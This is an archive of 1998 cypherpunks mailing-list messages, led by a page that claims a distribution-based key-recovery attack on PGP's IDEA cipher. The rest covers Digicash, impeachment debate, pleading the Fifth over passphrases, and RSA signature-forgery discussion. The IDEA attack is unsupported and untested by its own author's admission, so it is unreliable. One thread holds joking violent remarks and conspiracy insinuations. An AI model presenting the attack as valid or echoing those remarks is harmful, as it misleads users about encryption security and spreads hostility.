Content-Type: text/plain




Title: Privacy Page








Privacy



 

How private is your electronic communication ?


  [taken from the PGP FAQ]
  You should encrypt your e-mail for the same reason that you don't write
  all of your correspondence on the back of a post card. E-mail is actually far less secure
  than the postal system. With the post office, you at least put your letter inside an
  envelope to hide it from casual snooping. Take a look at the header area of any e-mail
  message that you receive and you will see that it has passed through a number of nodes on
  its way to you. Every one of these nodes presents the opportunity for snooping. 
  Encryption in no way should imply illegal activity. It is simply intended
  to keep personal thoughts personal. 


Do you trust your mail servers/gateways/virtual
redirects ?


  With the increasing use of virtual email accounts which allow you to keep the same
  email address no matter if you change jobs, ISPs, etc, the opportunity for snooping
  increases. 


Is PGP secure ?


  PGP uses acombination of IDEA, RSA and MD5. RSA is used to allow the transfer of
  session keys and MD5 is used to generate a unique message digest from the passphrase for
  generating the IDEA key and signatures. IDEA is the core algorithm used to encrypt the
  actual message. Thus the security of IDEA is also means the security of PGP <read the
  section 'is IDEA secure'>.


Is IDEA secure ?


  The IDEA algorithm (patented by ASCOM) is the core algorithmm
  used in PGP. It is based on a rotating 128 bit key split into 16 bit segments. The
  algorthm converts 64 bits of data at a time using the following operations '+', '^'
  (exclusive-or) and '*'.
  The formulas are :
  64 bit data => D1, D2, D3 and D4 (all 16 bits)
  => K1,K2,K3....rotating extra 25 bits after all 128 bits are
  used
  There are 2 phases in each round and 8 rounds in total + 1 final
  round of just phase 1.
  Phase 1:
  
    R1 = D1 * K1
    R2 = D2 + K2
    R3 = D3 + K3
    R4 = D4 * K4
  
  Phase 2:
  
    E1 = R1 xor (((R2 xor R4) + ((R3 xor R1) * K5)) * K6)
    E2 = R3 xor (((R2 xor R4) + ((R3 xor R1) * K5)) * K6)
    E3 = R2 xor ((((R2 xor R4) + ((R3 xor R1) * K5)) * K6) + ((R3 xor R1) * K5))
    E4 = R4 xor ((((R2 xor R4) + ((R3 xor R1) * K5)) * K6) + ((R3 xor R1) * K5))
    
  
  Given a large random data message (ie 1000 samples - 64*1000 =
  8Kb file). The distribution of the above operations can be used to break the key. ie both
  the '+' and the '^' operations give an even distribution but the '*' operator gives a
  biased distribution towards '0'.
  
    Distribution (where '*' has a bias towards 1 of a) 
    R1 = a
    R2 = even
    R3 = even
    R4 = a
    (a5 & a6 are the bias for K5 and K6)
    E1 = (bias a5) * (bias a6)
    E2 = (bias a5) * (bias a6)
    E3 = (bias a5) - (2 * (bias a5) * (bias a5) * (bias a6)) + ((bias
    a5) * (bias a6))
    
      = (bias a5) * (1 + (bias a6) - (2*(bias a5)*(bias a6))) 
    
    E4 = (bias a5) - (2 * (bias a5) * (bias a5) * (bias a6)) + ((bias
    a5) * (bias a6))
    
      = (bias a5) * (1 + (bias a6) - (2*(bias a5)*(bias a6))) 
    
    Also as the '*' operator is biased towards its own bit for the
    result '1' - approx (60% to 100% depending on bit position). [Working from the low bit
    upwards will provide an even greater approximation as then you would have the relevant Key
    bits against a random data. ie for 1st bit, it is 100% dependant on the bit for a '1',...]
    eg using a simple 3x3 matrix on second bit, gives (only
    demonstrating the ratio):
         if K bit is 1 => bias a ~ (2/8), if K
    bit is 0 => bias a ~(1/8) 
    ==> We can determine when :
    
      K5=0 and K6=0 as (bias a5) and (bias a6) will be at their highest
      
        ==> E1 & E2 are highest
      
      K5=1 and K6=1 as (bias a5) and (bias a6) are at their lowest
      
        ==> E1 & E2 are Lowest 
      
      To determine between K5=0,K6=1 and K5=1,K6=0. 
      
        K5 can be determined by check with E3 & E4 as they are both
        equal to :
        (bias a5) * (1 + (bias a6) - (2*(bias a5)*(bias a6)))  =>
        directly relate to (bias a5) => K5
      
      
        =>When K5=0, both E3 & E4 will be low.
        => When K5=1, both E3 & E4 will be high.
      
       
    
  
  The Key rotation start bits are :
  
    
      Phase
      K1
      K2
      K3
      K4
      K5
      K6
    
    
      1
      0
      16
      32
      48
      64
      80
    
    
      2
      96
      112
      25
      41
      57
      73
    
    
      3
      89
      105
      121
      9
      50
      66
    
    
      4
      82
      98
      114
      2
      18
      34
    
    
      5
      75
      91
      107
      123
      11
      27
    
    
      6
      43
      59
      100
      116
      4
      20
    
    
      7
      36
      52
      68
      84
      125
      13
    
    
      8
      29
      45
      61
      77
      93
      109
    
    
      final
      22
      38
      54
      70
      n/a
      n/a
    
  
   
  Working backwards with these distributions you can deduce the
  key. 
  ie work out K5 (93..108) and K6 (109..124) from its distribution
  pattern [using just the distributions for E2 & E3, as E1 & E4 have had the '*'
  operation applied in the final phase], then with K5 and K6 work out K1..K4 (22..85). You
  now have the key values for K1 to K6 !!!. Modify the Samples such they are back a phase
  and repeat (ie for each sample work backwards using known K1..K6 to find the E1..4
  values). 
  MAJOR ASSUMPTION : Assume that a large random sample provides a
  close to  even distribution at the end of each phase (For E2 & E3) such that the
  bias (ie a5 & a6) used to determine E2 and E3 are the only significant factors. 
  Reasoning : If the distribution is not even, then it is very much
  easier to break (ie only the key values can cause the change in distribution pattern =>
  know the pattern, know the key).
  I have developed a program which does just this (NOTE: not tested
  with real PGP data, as I have not had the time to investigate how the PGP file is
  structured, ie where the IDEA code starts and ends).
  It is available under a copyleft license similar to GNU. The Java Source code can be found at
  :
  [Application will not
  be released until beginning of 1999 when enough people are
  aware of the potential problem, and solutions are widely available - thus the threat to
  the general users privacy is kept to a minimal. Software houses which would like a delay
  in the release of this application so as to provide a solution should email: SGOSHA33@mailexcite.com with their request]
   


What can we do ?


  The above crack works because there is a large sample involved.
  If however you pre-encrypted the file such that you got your pre-encrypted file and a key
  file, where this key file is small and contains only the key required to open the
  pre-encrypt file. You then PGP the two files, this would make it much harder to break as
  the key file cannot be broken from the sampling technique descibed above.
  I have developed an application which does just that. It is
  available under a copyleft license similar to GNU. The Java source code can be found
  here : 
  kiss.zip



  To run the application you will need Java installed on your
  machine. Place the files in a directory named KISS. The command line is :
  
    java KISS.kiss e <filename>
                - encrypt
    java KISS.kiss d <filename>
                - decrypt (do not add
    the kiss extension to the filename)
  



  After encryption you will get 2 files. The '.kiss' file is the
  encrypted file and the '.lips' file contains the key used to encrypt the file. You should
  then encrypt both files with PGP.


 

What is in the pipeline for the future ?


  Task 1
  The above 'kiss' pre-encryption is not 100% safe from non-bruteforce cracking !! 
  As the majority of files encrypted are text messages which are based mainly on the
  characters 'a' to 'z' thus the Ascii codes of the characters are of the form  
  011xxxxx. From this you can see that the rotating distribution as used above will tend
  toward '1'. Thus with enough samples they can deduce the key with the simple equation.
  
    KeyValue xor 1 = CommonValue ==> KeyValue = !CommonValue
  
  To prevent this my next application (codename Stable) will be a stabiliser program
  which will ensure that the distribution of the data has an even distribution.
  Target Release Date : 30/9/98.
  Task 2
  The integration of both 'kiss' and 'stable'.
  Target Release Date : 15/10/98.
  Task 3
  Port of both kiss and stable to C/C++ (for speed and also for Task 4). [Wrote Kiss and
  Stable in Java to test the speed of Java and also how it handled bit manipulation
  operations].
  Target Release Date : 31/10/98.
  Task 4
  Integration with PGP to provide uses with a much easier encryption method.



  Target Release Date : 31/11/98.


Author : SGOSHA33

Return to Albert's Home Page.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "eGroups.com Help" <support@findmail.com>
Date: Sat, 19 Sep 1998 21:44:01 +0800
To: cypherpunks@cyberpass.net
Subject: Please Verify to Complete Your eGroups.com Registration
Message-ID: <19980920024852.8835.qmail@findmail.com>
MIME-Version: 1.0
Content-Type: text/plain



Thank you for requesting an eGroups.com account.  

To complete your registration, you MUST ENTER the following 
number into the Web form at 
http://www.egroups.com/register?email=cypherpunks%40cyberpass.net&vid=22118666
(equivalent to the form on your browser). 

Number: 22118666

This step ensures that only you can control your e-mail 
subscriptions.   

If you have any questions, please visit 
http://www.egroups.com/info/help.html

Thanks!

Sincerely,

The eGroups.com Team




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 19 Sep 1998 20:13:53 +0800
To: coderpunks@toad.com
Subject: Repost in text: IDEA(tm) weakness
Message-ID: <199809200116.DAA28107@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




                                  [INLINE]
   
                                  Privacy
                                      
                                  [INLINE]
   
   
   How private is your electronic communication ?
   
     [taken from the PGP FAQ]
     
     You should encrypt your e-mail for the same reason that you don't
     write all of your correspondence on the back of a post card. E-mail
     is actually far less secure than the postal system. With the post
     office, you at least put your letter inside an envelope to hide it
     from casual snooping. Take a look at the header area of any e-mail
     message that you receive and you will see that it has passed
     through a number of nodes on its way to you. Every one of these
     nodes presents the opportunity for snooping.
     
     Encryption in no way should imply illegal activity. It is simply
     intended to keep personal thoughts personal.
     
   Do you trust your mail servers/gateways/virtual redirects ?
   
     With the increasing use of virtual email accounts which allow you
     to keep the same email address no matter if you change jobs, ISPs,
     etc, the opportunity for snooping increases.
     
   Is PGP secure ?
   
     PGP uses acombination of IDEA, RSA and MD5. RSA is used to allow
     the transfer of session keys and MD5 is used to generate a unique
     message digest from the passphrase for generating the IDEA key and
     signatures. IDEA is the core algorithm used to encrypt the actual
     message. Thus the security of IDEA is also means the security of
     PGP <read the section 'is IDEA secure'>.
     
   Is IDEA secure ?
   
     The IDEA algorithm (patented by ASCOM) is the core algorithmm used
     in PGP. It is based on a rotating 128 bit key split into 16 bit
     segments. The algorthm converts 64 bits of data at a time using the
     following operations '+', '^' (exclusive-or) and '*'.
     
     The formulas are :
     
     64 bit data => D1, D2, D3 and D4 (all 16 bits)
     
     => K1,K2,K3....rotating extra 25 bits after all 128 bits are used
     
     There are 2 phases in each round and 8 rounds in total + 1 final
     round of just phase 1.
     
     Phase 1:
     
     R1 = D1 * K1
     
     R2 = D2 + K2
     
     R3 = D3 + K3
     
     R4 = D4 * K4
     
     Phase 2:
     
     E1 = R1 xor (((R2 xor R4) + ((R3 xor R1) * K5)) * K6)
     E2 = R3 xor (((R2 xor R4) + ((R3 xor R1) * K5)) * K6)
     E3 = R2 xor ((((R2 xor R4) + ((R3 xor R1) * K5)) * K6) + ((R3 xor
     R1) * K5))
     E4 = R4 xor ((((R2 xor R4) + ((R3 xor R1) * K5)) * K6) + ((R3 xor
     R1) * K5))
     
     Given a large random data message (ie 1000 samples - 64*1000 = 8Kb
     file). The distribution of the above operations can be used to
     break the key. ie both the '+' and the '^' operations give an even
     distribution but the '*' operator gives a biased distribution
     towards '0'.
     
     Distribution (where '*' has a bias towards 1 of a)
     
     R1 = a
     
     R2 = even
     
     R3 = even
     
     R4 = a
     
     (a5 & a6 are the bias for K5 and K6)
     
     E1 = (bias a5) * (bias a6)
     
     E2 = (bias a5) * (bias a6)
     
     E3 = (bias a5) - (2 * (bias a5) * (bias a5) * (bias a6)) + ((bias
     a5) * (bias a6))
     
     = (bias a5) * (1 + (bias a6) - (2*(bias a5)*(bias a6)))
     
     E4 = (bias a5) - (2 * (bias a5) * (bias a5) * (bias a6)) + ((bias
     a5) * (bias a6))
     
     = (bias a5) * (1 + (bias a6) - (2*(bias a5)*(bias a6)))
     
     Also as the '*' operator is biased towards its own bit for the
     result '1' - approx (60% to 100% depending on bit position).
     [Working from the low bit upwards will provide an even greater
     approximation as then you would have the relevant Key bits against
     a random data. ie for 1st bit, it is 100% dependant on the bit for
     a '1',...]
     
     eg using a simple 3x3 matrix on second bit, gives (only
     demonstrating the ratio):
     
          if K bit is 1 => bias a ~ (2/8), if K bit is 0 => bias a
     ~(1/8)
     
     ==> We can determine when :
     
     K5=0 and K6=0 as (bias a5) and (bias a6) will be at their highest
     
     ==> E1 & E2 are highest
     
     K5=1 and K6=1 as (bias a5) and (bias a6) are at their lowest
     
     ==> E1 & E2 are Lowest
     
     To determine between K5=0,K6=1 and K5=1,K6=0.
     
     K5 can be determined by check with E3 & E4 as they are both equal
     to :
     
     (bias a5) * (1 + (bias a6) - (2*(bias a5)*(bias a6)))  => directly
     relate to (bias a5) => K5
     
     =>When K5=0, both E3 & E4 will be low.
     
     => When K5=1, both E3 & E4 will be high.
     
     
     The Key rotation start bits are :
     
   Phase K1 K2 K3 K4 K5 K6
   1 0 16 32 48 64 80
   2 96 112 25 41 57 73
   3 89 105 121 9 50 66
   4 82 98 114 2 18 34
   5 75 91 107 123 11 27
   6 43 59 100 116 4 20
   7 36 52 68 84 125 13
   8 29 45 61 77 93 109
   final 22 38 54 70 n/a n/a
   
     
     Working backwards with these distributions you can deduce the key.
     
     ie work out K5 (93..108) and K6 (109..124) from its distribution
     pattern [using just the distributions for E2 & E3, as E1 & E4 have
     had the '*' operation applied in the final phase], then with K5 and
     K6 work out K1..K4 (22..85). You now have the key values for K1 to
     K6 !!!. Modify the Samples such they are back a phase and repeat
     (ie for each sample work backwards using known K1..K6 to find the
     E1..4 values).
     
     MAJOR ASSUMPTION : Assume that a large random sample provides a
     close to  even distribution at the end of each phase (For E2 & E3)
     such that the bias (ie a5 & a6) used to determine E2 and E3 are the
     only significant factors.
     
     Reasoning : If the distribution is not even, then it is very much
     easier to break (ie only the key values can cause the change in
     distribution pattern => know the pattern, know the key).
     
     I have developed a program which does just this (NOTE: not tested
     with real PGP data, as I have not had the time to investigate how
     the PGP file is structured, ie where the IDEA code starts and
     ends).
     
     It is available under a copyleft license similar to GNU. The Java
     Source code can be found at :
     
       [Application will not be released until beginning of 1999 when
     enough people are aware of the potential problem, and solutions are
     widely available - thus the threat to the general users privacy is
     kept to a minimal. Software houses which would like a delay in the
       release of this application so as to provide a solution should
             email: SGOSHA33@mailexcite.com with their request]
     
                                      
   What can we do ?
   
     The above crack works because there is a large sample involved. If
     however you pre-encrypted the file such that you got your
     pre-encrypted file and a key file, where this key file is small and
     contains only the key required to open the pre-encrypt file. You
     then PGP the two files, this would make it much harder to break as
     the key file cannot be broken from the sampling technique descibed
     above.
     
     I have developed an application which does just that. It is
     available under a copyleft license similar to GNU. The Java source
     code can be found here :
     
                                  kiss.zip
     
     To run the application you will need Java installed on your
     machine. Place the files in a directory named KISS. The command
     line is :
     
     java KISS.kiss e <filename>             - encrypt
     
     java KISS.kiss d <filename>             - decrypt (do not add the
     kiss extension to the filename)
     
     After encryption you will get 2 files. The '.kiss' file is the
     encrypted file and the '.lips' file contains the key used to
     encrypt the file. You should then encrypt both files with PGP.
     
   
   What is in the pipeline for the future ?
   
     Task 1
     
     The above 'kiss' pre-encryption is not 100% safe from
     non-bruteforce cracking !!
     
     As the majority of files encrypted are text messages which are
     based mainly on the characters 'a' to 'z' thus the Ascii codes of
     the characters are of the form   011xxxxx. From this you can see
     that the rotating distribution as used above will tend toward '1'.
     Thus with enough samples they can deduce the key with the simple
     equation.
     
     KeyValue xor 1 = CommonValue ==> KeyValue = !CommonValue
     
     To prevent this my next application (codename Stable) will be a
     stabiliser program which will ensure that the distribution of the
     data has an even distribution.
     
     Target Release Date : 30/9/98.
     
     Task 2
     
     The integration of both 'kiss' and 'stable'.
     
     Target Release Date : 15/10/98.
     
     Task 3
     
     Port of both kiss and stable to C/C++ (for speed and also for Task
     4). [Wrote Kiss and Stable in Java to test the speed of Java and
     also how it handled bit manipulation operations].
     
     Target Release Date : 31/10/98.
     
     Task 4
     
     Integration with PGP to provide uses with a much easier encryption
     method.
     
     Target Release Date : 31/11/98.
     
                                                        Author : SGOSHA33
   
                       Return to Albert's Home Page.
   
                                  [INLINE]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 19 Sep 1998 20:17:52 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Going Cashless: Bank ends ECash trial period
Message-ID: <199809200120.DAA28658@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Thomas Junker writes:
>    Fagen also cited the changing climate in the U.S. for Internet
>    payments. When the trial was started in 1995, she said, "people
>    were more fearful of using credit cards to pay for things over
>    the Internet. Now that seems to have disappeared." 
>
>Had Ms. D'Amico understood the nature of Digicash, she may have 
>questioned Ms. Fagen about the apparent non sequitur.  If Digicash 
>had nothing to do with making credit transactions "safer," why would 
>decreasing public fear of using credit cards on the Internet have 
>anything to do with Mercantile's decision to abruptly discontinue the 
>Digicash program?  

This seems clear enough.  Digicash was competing with credit cards as a
payment system.  One of its advantages was that you didn't have to send
your credit card number across the net.  As fear of transferring credit
card numbers declined, Digicash lost this advantage.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@remailer.ch>
Date: Sat, 19 Sep 1998 22:24:52 +0800
To: Jim Choate <cypherpunks@cyberpass.net
Subject: Re: Clinton's fake apologies (fwd)
Message-ID: <19980920032435.24227.qmail@hades.rpini.com>
MIME-Version: 1.0
Content-Type: text/plain



In reply to my suggestion that lieing under oath isn't
a very good reason for impeachment,  

Jim Choate <ravage@einstein.ssz.com> wrote:
> Of course it's different if you preface your lie with "I swear to tell the
> truth, the whole truth, and nothing but the truth".
> 
> The oath is voluntary and therefore if broken no claim for duress, only
> intentional misdirection, can explain such actions.

echoed by nobody@remailer.ch who wrote:
> ...If some public figure ... goes under oath and then lies, ...
> he's trying to throw a wrench in the
> justice system. It wouldn't be as bad if somebody like Jim or I lied under
> oath, but this guy is the chief executive of the United States. He's
> basically Top Cop, and his administration doesn't hesitate to press
> charges against people who commit all sorts of victimless crimes.
> 

I agree it's bad. I agree it undermines the justice system a little bit.
But, ... impeachment?

You're not charging him with murder (eg WACO), attacking the 1st ammendment (CDA),
the 4th (SSN on driver's licences), the 5th (GAK). You're going after Al Capone
for tax evasion. You want to get him because he's a Bad Person not because of
the particular crime. This is ironic, because his crimes against our basic
rights were committed while pursuing Bad People, but it is also hypocritical.

nobody@remailer.ch also wrote:
> [quoting me]
> > I'm honoured to draw an ad hominem before revealing that I'm on AOL.
> >
> > -- an anonymous aol32 user.
> 
> Actually, the amazing thing is that you're from AOL. You're coherent, you
> quote, and you know how to use a remailer. One in a million. ;)

Unbelievable, I would have thought. ;->

-- Aol32Monger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 19 Sep 1998 23:59:34 +0800
To: cypherpunks@cyberpass.net
Subject: Re: CHALLENGE? Toto/signature attack w. unpublished public key
Message-ID: <199809200502.HAA08667@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> > In addition it has to be that n is the right length based on the "s"
> > padding.  This limits it to an 8 bit range, in this case 1024-1031
> > bits.
> 
> The constraint I gave was that log(n) = 1024.  Bear in mind that the
> msbyte of s = 0x08, so we know that n > s, and I think we know that n
> < 2^1024 also based on the s padding from the signature. So based on
> this n would be in the range 1020 - 1024 bits, right?

Actually there is somewhat more flexibility than this.  You made up the
padding, it didn't come from the file, did it?  You could add perhaps 1
more byte of FF without stretching credibility too extremely.  Then n
could be 1020 - 1032 bits.  It's too bad that s started out so small
(assuming the "true" n was 1024 bits).

> > If you make n be a product of a bunch of small primes, so that you
> > can make signatures with it, then a third party can detect this and
> > know it is bogus.
> 
> He has to factor your n to determine that it is bogus though?  This
> would imply that he had more compute than you do.  (Not unreasonable
> threat model mind).

But didn't YOU have to factor n also?  That's what you showed, originally,
a large s^e which you factored down to get some small factors and a big
one.  If you manage to get a prime factorization you can combine factors
to get your n.  But it won't be any harder for him to factor than it was
for you.

> Resources available: one low end pentium based linux PC? :-) Just that
> the attack is clearly feasible is interesting though a demonstration
> would be perhaps more convincing to less technically aware IRS people.
> The biggest resource overhead is implementing that lot though, unless
> there exist packages or libraries which already do most of it for you.

The discrete log algorithm is similar to quadratic sieve and other modern
factoring algorithms.  You do multiple factorizations of other numbers
and combine them to generate the desired relationships.  The difference
is that the factor base is not just the primes, it uses special numbers.

There was a break a few years ago of the discrete log modulus being
used by Sun's RPC.  This was something like 200-300 bits.  Maybe that
discrete log code could be obtained from the authors.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RealNetworks News <announce@dmail1.real-net.net>
Date: Sun, 20 Sep 1998 09:20:52 +0800
To: cypherpunks@toad.com
Subject: Important: RealPlayer G2 Beta Expiration
Message-ID: <199809201413.HAA09326@dmail3.real-net.net>
MIME-Version: 1.0
Content-Type: text/plain



Dear RealPlayer G2 Beta Customer,

As part of our ongoing commitment to improve 
customer service we want to notify you of some 
important technical information.  In some cases our 
customers have noticed that their RealPlayer G2 Beta
has expired.  In order to continue using your 
RealPlayer G2 Beta, please read and follow the 
simple instructions below.

+===+===+===+===+===+===+===+===+===+===+
If Your RealPlayer G2 Beta Has Expired

If you see a message warning you that your RealPlayer
has expired, you may correct this problem by visiting 
RealNetworks Service and Support web site.  Just 
click on the link below and follow the instructions 
on the page.

---> http://service.real.com/help/expired.html

+===+===+===+===+===+===+===+===+===+===+
If Your RealPlayer G2 Beta Has Not Already Expired

You may have already received a notification from 
your RealPlayer G2 Beta indicating that a new update
is available.  If you installed the update by 
responding to the notification, your RealPlayer G2 Beta
expiration date has been extended and you do not need 
to take any further action.

If you have not installed the update, please do so now 
by visiting RealNetworks Service and Support web site.  
Just follow the instructions under the section labeled: 
"If your G2 RealPlayer Beta has not already expired."

---> http://service.real.com/help/expired.html

NOTE:  If you have already contacted RealNetworks
Support you will not need to take any action.

Thank you for supporting RealNetworks products,

Maria Cantwell
Senior Vice President
RealNetworks, Inc.
Seattle, WA  USA

---------------------------------------------
 ABOUT THIS E-MAIL

 Participation in RealNetworks product updates
 and special offers is voluntary. During the 
 installation of the RealPlayer Plus software you
 indicated a preference to receive these emails.

 For information about subscribing to or 
 unsubscribing from future announcements, visit 
 http://www.real.com/mailinglist/index.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@remailer.ch>
Date: Sun, 20 Sep 1998 02:16:15 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Clinton's fake apologies (fwd)
Message-ID: <19980920072503.29931.qmail@hades.rpini.com>
MIME-Version: 1.0
Content-Type: text/plain



On 20 Sep 1998, Anonymous wrote:

>
> In reply to my suggestion that lieing under oath isn't
> a very good reason for impeachment,
>
> Jim Choate <ravage@einstein.ssz.com> wrote:
> > Of course it's different if you preface your lie with "I swear to tell the
> > truth, the whole truth, and nothing but the truth".
> >
> > The oath is voluntary and therefore if broken no claim for duress, only
> > intentional misdirection, can explain such actions.
>
> echoed by nobody@remailer.ch who wrote:
> > ...If some public figure ... goes under oath and then lies, ...
> > he's trying to throw a wrench in the
> > justice system. It wouldn't be as bad if somebody like Jim or I lied under
> > oath, but this guy is the chief executive of the United States. He's
> > basically Top Cop, and his administration doesn't hesitate to press
> > charges against people who commit all sorts of victimless crimes.
> >
>
> I agree it's bad. I agree it undermines the justice system a little bit.
> But, ... impeachment?

Yes.

We have some jokester sitting in Washington with full authority over our
military forces. The people can't believe a word he says. Congress can't
believe a word he says. He rules by executive order. He ignores the
Constitution.

There is argument over whether he ordered military strikes to divert
attention from his scandal and whether he sold the country out to the Red
Chinese. Now people like myself are thinking - totally justified - that
this guy will do absolutely anything to hold on to his presidency.

I don't feel particularly secure with some guy who I can't trust running
the military and with his finger on the nuclear button. That itself is a
violation of national security.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Sun, 20 Sep 1998 04:14:42 +0800
To: Reeza! <cypherpunks@toad.com>
Subject: Re: Clinton's fake apologies (fwd)
In-Reply-To: <3.0.5.32.19980920152605.0086ba30@205.83.192.13>
Message-ID: <Pine.BSF.3.96.980920085802.683G-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 20 Sep 1998, Reeza! wrote:

   [snip bunch of a good ream applied where required --]

>
>In case you hadn't noticed, the investigation of him, vis-a-vis the rules
>established by other demicans, his supposed compatriates, is still ongoing. 
>
>Methinks this is just the tip of the iceberg, a bone for the populace to
>chew on so that when the rest of the story breaks, we (the dog) won't
>notice the prime rib and sirloin.
>
    we all know that -- the question is whether or not the Klintons have
    left enough witnesses alive to prove it!  who's next on their hit
    parade?

>I congratulate you for your defense of a person who demonstrably has broken
>his marriage vows, his oath of public office, and purjured himself while
>under an additional oath in a court of law.
>
>You, too, are a few neurons short of a functional synapse.
>
    perfect! slap! slap! let's do it again!

>I suggest you discuss it with the maker. The best way is large caliber
>bullet at sufficient velocity to penetrate and exit the cranial cavity.
>
    cant do this one more than once unless it's Vince Foster.

>God speed, you fucking idiot.
>
    yup, praise the Lord, and pass the ammo; we'll even help a few you
    fellows out [the door].

>Reeza!
>
    gave me a good laugh --thanx, Reeza!

    ooo-rah!


>	The world was on fire,,, but no one could save me but you...
>		Strange what desire ,,will make foolish people do.....
>			(to the back beat)
>				This world is only gonna break your heart....
>					==C.I.==
>

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....
    There is no safety this side of the grave.  Never was; never will be.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sun, 20 Sep 1998 08:49:04 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Forwarded mail...
Message-ID: <199809201416.JAA13430@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 20 Sep 1998 09:35:33 +0200
> From: Anonymous <nobody@replay.com>

> 
> To my understanding pleading the 5th in response to a court order for your
> passphrase would work, correct?  Or would you be liable under contempt of
> court?
> 

It should work, though I don't believe it's ever been tested in court. I've
been looking at the court forcing one to take immunity and can't find
anything that would support such actions. So if you haven't told the court
you will cooperate *and* you say nothing more than that you're taking the
5th there shouldn't be much they can do except charge you as an accomplice
and hope for a conviction on other material.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 20 Sep 1998 02:46:10 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199809200735.JAA15794@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



To my understanding pleading the 5th in response to a court order for your passphrase would work, correct?  Or would you be liable under contempt of court?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sun, 20 Sep 1998 04:12:34 +0800
To: cypherpunks@cyberpass.net
Subject: Re: CHALLENGE? Toto/signature attack w. unpublished public key
In-Reply-To: <199809200502.HAA08667@replay.com>
Message-ID: <199809200836.JAA28403@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Anonymous writes:
> > > In addition it has to be that n is the right length based on the "s"
> > > padding.  This limits it to an 8 bit range, in this case 1024-1031
> > > bits.
> > 
> > The constraint I gave was that log(n) = 1024.  Bear in mind that the
> > msbyte of s = 0x08, so we know that n > s, and I think we know that n
> > < 2^1024 also based on the s padding from the signature. So based on
> > this n would be in the range 1020 - 1024 bits, right?
> 
> Actually there is somewhat more flexibility than this.  You made up the
> padding, it didn't come from the file, did it?

I used PGP to make an m to match a 1024 bit n which I presumed from a
1024 bit s; s is from the signature packet from the signed post in
question.  I made the assumption that for a 1024 bit s, the padded
message digest m would be of size 1024 bit also, with it's leading 00
01 FF ... FF etc.  

> You could add perhaps 1 more byte of FF without stretching
> credibility too extremely.  Then n could be 1020 - 1032 bits.  It's
> too bad that s started out so small (assuming the "true" n was 1024
> bits).

I see what you are saying: that if n had been even 1032 bits, it would
still be possible (though relatively unlikely) to result in a s <
1024, which would mean that the m I presumed could have had been a
byte longer.  I think your assumption that PGP would not encode the
leading 0 byte (in the s) is correct, from past PGP code tinkering.
In fact I guess that actually this statement generalises and (with an
even smaller probability) the n could have been 1040 bits, and the s
just happened to come out < 1024 bits, and so on.

I'll see if I can induce this effect by generating a 1025 bit key, and
seeing if any of the signatures come out at 1024 bits:

n =	0x0181291263B847EBEBFDC65E9128DDE9015522B461618F43CDBBF3D707507BA9
	  A71B002F4F852EEC1465710B1641C8816D3E0851C41C2A11E89062E424116A69
	  6E0FB179C7439C6C2F88A214E8D9877658A82982783FA5597262D6CD648111EB
	  A3AB12FC9EB71FB90222624D188E31A3B3333020740860E5F11250D10E2E61F77D
e =	0x11
s =	0x5AA544A471AA79074796D0C85BE01DF44BBED7F14C1189D2D114F8A4E9D4D20E
	  1E67ED9CFA8E20F4D9B84B9C82918F5721D984C7D3A2E2561D399982DFD38873
	  3665745849F83EA14A2D2D586CCB253515E63CF81E2C3927D991E25FAE673DEC
	  E18DB2F6014850CE97F2910393166577F120C4A9512B122F47E05FB117702D6B

So yes, n = 1025 bits, and this particular s is 1023 bits, and this
one is 1025 bits:

s' =	0x012B4B5218E1173DCEF5525C3E9E72BA962371372DA9E9D8D1B469A3BD1060E1
	  5F0ABA0E0BD9B497944FA9AE039F7F006591470857E0CB4FCB460485307A4366
	  54105112BD2E548B6BA9E6B950BC37D39A51ADC169B34935D052DFEEEA9A9FFC
	  BEA4D85BF22D87D66BCB3530EE5316F22A4A4BC4FAB33E592B019E87DE1EAB7336

(most of them work out to be < 1025 bits).

> > > If you make n be a product of a bunch of small primes, so that you
> > > can make signatures with it, then a third party can detect this and
> > > know it is bogus.
> > 
> > He has to factor your n to determine that it is bogus though?  This
> > would imply that he had more compute than you do.  (Not unreasonable
> > threat model mind).
> 
> But didn't YOU have to factor n also?  That's what you showed, originally,
> a large s^e which you factored down to get some small factors and a big
> one.  If you manage to get a prime factorization you can combine factors
> to get your n.  But it won't be any harder for him to factor than it was
> for you.

Yes, you are right.  

Presented with two public keys (n,e), and (n',e') and a signature s,
